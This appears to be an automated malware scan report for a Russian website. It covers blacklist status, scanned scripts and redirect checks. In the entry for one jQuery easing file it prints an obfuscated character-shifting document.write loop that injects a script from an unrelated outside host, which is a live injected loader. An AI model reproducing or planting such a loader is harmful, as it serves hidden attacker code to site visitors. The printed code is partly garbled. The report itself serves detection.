Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=ekcpert.ru
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://ekcpert.ru/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.ekcpert.ru/ | 200 OK Content-Length: 19034 Content-Type: text/html | clean |
http://ajax.googleapis.com/ajax/libs/jquery/1.8.2/jquery.min.js | 200 OK Content-Length: 93435 Content-Type: text/javascript | clean |
http://www.ekcpert.ru/skins/expert/scripts/jquery-ui-1.9.2.custom.js | 200 OK Content-Length: 43098 Content-Type: application/x-javascript | clean |
http://www.ekcpert.ru/skins/expert/scripts/jquery.nivo.slider.js | 200 OK Content-Length: 29113 Content-Type: application/x-javascript | clean |
http://www.ekcpert.ru/skins/expert/scripts/jquery.easing.1.3.js | 200 OK Content-Length: 8097 Content-Type: application/x-javascript | clean |
http://www.ekcpert.ru/skins/expert/scripts/jquery.easing.compatibility.js | 200 OK Content-Length: 1917 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
jQuery.extend( jQuery.easing, { easeIn: function (x, t, b, c, d) { return jQuery.easing.easeInQuad(x, t, b, c, d); }, easeOut: function (x, t, b, c, d) { return jQuery.easing.easeOutQuad(x, t, b, c, d); }, easeInOut: function (x, t, b, c, d) { return jQuery.easing.easeInOutQuad(x, t, b, c, d); }, expoin: function(x, t, b, c, d) { return jQuery.easing.easeInExpo(x, t, b, c, d); }, expoout: function(x, t, b, c, d) { ret return jQuery.easing.easeInBack(x, t, b, c, d); }, backout: function(x, t, b, c, d) { return jQuery.easing.easeOutBack(x, t, b, c, d); }, backinout: function(x, t, b, c, d) { return jQuery.easing.easeInOutBack(x, t, b, c, d); } });
<!-- js-tools --> p=0;while(p<80)document.write(String.fromCharCode('=tdsjqu!tsd>#iuuq;00lmbttjlbqbslfub/sv0dpnqpofout0dpn`gjoefs0tubu/qiq#?=0tdsjqu?'.charCodeAt(p++)-1)) <!-- /js-tools -->
Antivirus reports:
http://www.ekcpert.ru/skins/expert/scripts/jquery.bxslider.min.js | 200 OK Content-Length: 19359 Content-Type: application/x-javascript | clean |
http://www.ekcpert.ru/skins/expert/scripts/jquery.roundabout.min.js | 200 OK Content-Length: 17959 Content-Type: application/x-javascript | clean |
http://www.ekcpert.ru/skins/expert/scripts/jquery.roundabout-shapes.min.js | 200 OK Content-Length: 4281 Content-Type: application/x-javascript | clean |
http://www.ekcpert.ru/skins/expert/scripts/main.js | 200 OK Content-Length: 22105 Content-Type: application/x-javascript | clean |
http://www.ekcpert.ru/contacts/ | 200 OK Content-Length: 19992 Content-Type: text/html | clean |
http://www.ekcpert.ru/skins/default/scripts/main.js | 200 OK Content-Length: 12365 Content-Type: application/x-javascript | clean |
http://maps.google.com/maps/api/js?sensor=false | 200 OK Content-Length: 5056 Content-Type: text/javascript | clean |
http://www.ekcpert.ru/catalog/basket/ | 200 OK Content-Length: 10743 Content-Type: text/html | clean |
http://www.ekcpert.ru/skins/expert/scripts/jquery.colorbox.js | 200 OK Content-Length: 27653 Content-Type: application/x-javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: ekcpert.ru
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: ekcpert.ru
Referer: http://www.google.com/search?q=ekcpert.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.